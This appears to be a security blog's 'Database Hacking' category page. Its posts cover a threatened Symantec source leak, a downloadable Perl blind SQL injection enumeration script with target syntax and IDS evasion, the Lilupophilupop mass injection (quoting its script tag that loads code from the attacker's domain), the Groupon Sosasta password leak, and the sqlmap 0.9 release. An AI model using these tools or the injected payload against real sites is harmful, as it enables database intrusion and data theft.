Category: Database Hacking

Jan 05 2012

Hackers Threaten to Post Source Code for Symantec Product

Symantec Source Code StolenHackers have posted a file online that they claim is a confidential glimpse into Symantec’s Norton Antivirus program and have threatened to release source code for the security giant’s flagship antivirus product.

The hacker group, which calls itself the Lords of Dharmaraja, posted a file on Pastebin that it said described the confidential workings of Symantec’s Norton Antivirus threat-detection product. The documentation, and any source code, could be exploited by hackers to corrupt the antivirus program or write malicious code that circumvents Norton’s product altogether. The original post is no longer on Pastebin, although there is a Google cache.

The hackers claim to have discovered Symantec’s source code in a hack they conducted on India’s military and intelligence servers. In their online post, the hackers said, “We have discovered within the Indian Spy Program source codes of a dozen software companies,” which the hackers said had signed agreements with an Indian defense program and India’s Central Bureau of Investigation.

In an e-mail, a Symantec spokesman, Cris Paden, said the hackers’ post was an outdated document from 1999 that “explains how the software is designed to work (what inputs are accepted and what outputs are generated) and contains function names, but there is no actual source code present.”

The hacker group threatened to release the actual source code for the Norton AntiVirus software later on. “We are working out mirrors as of now,” the hackers wrote in their post.

Mr. Paden said Symantec was “currently investigating that.”

Symantec’s Norton brand antivirus products make up the bulk of its sales to consumers, which totaled nearly $2 billion last year — a third of Symantec’s revenue. If any part of its source code was exploited or tampered with, it could hurt Symantec’s share price and bottom line.

“If this document is from 1999, chances are the source code has changed a fair bit,” said Robert Rachwald, director of security strategy at Imperva, an Internet security company. ”But if Symantec hasn’t done any major overhauls, there may be some parts of the code that remain intact,” he said, and someone could find a way to poke holes in it.

Jan 03 2012

Fully Automated MySQL 5 Boolean Enumeration Script

This script uses blind SQL injection and boolean enumeration to perform INFORMATION_SCHEMA Mapping.

Syntax:

perl mysql5enum.pl -h [hostname] -u [url] [-q [query]]

Example:

perl mysql5enum.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q “select system_user()”

Description:
– By default, this script will first determine username, version and database name before enumerating the information_schema information.
– When the -q flag is applied, a user can supply any query that returns only a single cell.
– If the exploit or vulnerability requires a single quote, simply tack %27 to the end of the URI.
– This script contains error detection: It will only work on a mysql 5.x database, and knows when its queries have syntax errors.
– This script uses perl’s LibWhisker2 for IDS Evasion (The same as Nikto).
– This script uses the MD5 algorithm for optimization. There are other optimization methods, and this may not work on all sites.

Download: mysql5enum.pl.zip

Jan 01 2012

Lilupophilupop SQL Injection Tops 1 Million Infected Pages

Lilupophilupop SQL InjectionA SQL attack which is increasing at extremely fast rates has been uncovered by ISC ( Internet Storm Center ) has seen to raise from just a few hundred pages to over 1 million in just a few weeks.

From the past few weeks of going over submitted results and information from interweb users they have put together some interesting data, one it seems to be targeting windows based servers and from the logs it seems they had been doing a bit of probing around within the weeks before the sites been injected with a special string:

“></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>

They have also put together fairly solid base of ccTLD’s statistics of which have been infected (as shown below) -

  • UK – 56,300
  • NL – 123,000
  • DE – 49,700
  • FR – 68,100
  • DK – 31,000
  • CN – 505
  • CA – 16,600
  • COM – 30,500
  • RU – 32,000
  • JP – 23,200
  • ORG – 2,690

At the moment it looks like it is partially automated and partially manual. The manual component and the number of sites infected suggests a reasonable size work force or a long preparation period.

If you want to find out if you have a problem just search for “<script src=”http://lilupophilupop.com/” in google and use the site: parameter to hone in on your domain.

Original Findings and Comments: ISC Diary | SQL Injection Attack happening ATM

Jun 28 2011

Groupon Leaks Entire Indian User Database

The entire user database of Groupon’s Indian subsidiary Sosasta.com was accidentally published to the Internet and indexed by Google.

The database includes the e-mail addresses and clear-text passwords of the site’s 300,000 users. It was discovered by Australian security consultant Daniel Grzelak as he searched for publicly accessible databases containing e-mail address and password pairs.

Grzelak used Google to search for SQL database files that were web accessible and contained keywords like “password” and “gmail”.

“A few hours and tweaks later, this database came up,” he said. “I started scrolling, and scrolling and I couldn’t get to the bottom of the file. Then I realised how big it actually was.”

Grzelak contacted Risky.Biz after the Sosasta discovery to seek advice on disclosure. This website contacted the CEO of Groupon, Andrew Mason, who called back personally within 24 hours of initial contact.

The database was removed immediately and the company has launched an internal investigation to find out how it wound up publicly accessible in the first place.

Groupon is notifying all its Sosasta users of the incident and is advising them that the passwords they used on the website are now compromised and cannot be relied upon to secure other accounts.

Source: Risky.Biz

Apr 12 2011

sqlmap 0.9 Released – SQL Injection Tool

sqlmap 0.9After a year of hardcore development, sqlmap 0.9 is out!

Introduction:
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

New Features:

  • Rewritten SQL injection detection engine
  • Support to directly connect to the database without passing via a SQL injection, -d switch
  • Added full support for both time-based blind SQL injection and error-based SQL injection techniques
  • Implemented support for SQLite 2 and 3
  • Implemented support for Firebird
  • Implemented support for Microsoft Access, Sybase and SAP MaxDB
  • Added support to tamper injection data with –tamper switch
  • Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack
  • Added support to fetch unicode data
  • Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch
  • Implemented several optimization switches to speed up the exploitation of SQL injections
  • Support to parse and test forms on target url, –forms switch
  • Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns.

Demo:

Download: sqlmap-0.9.tar.gz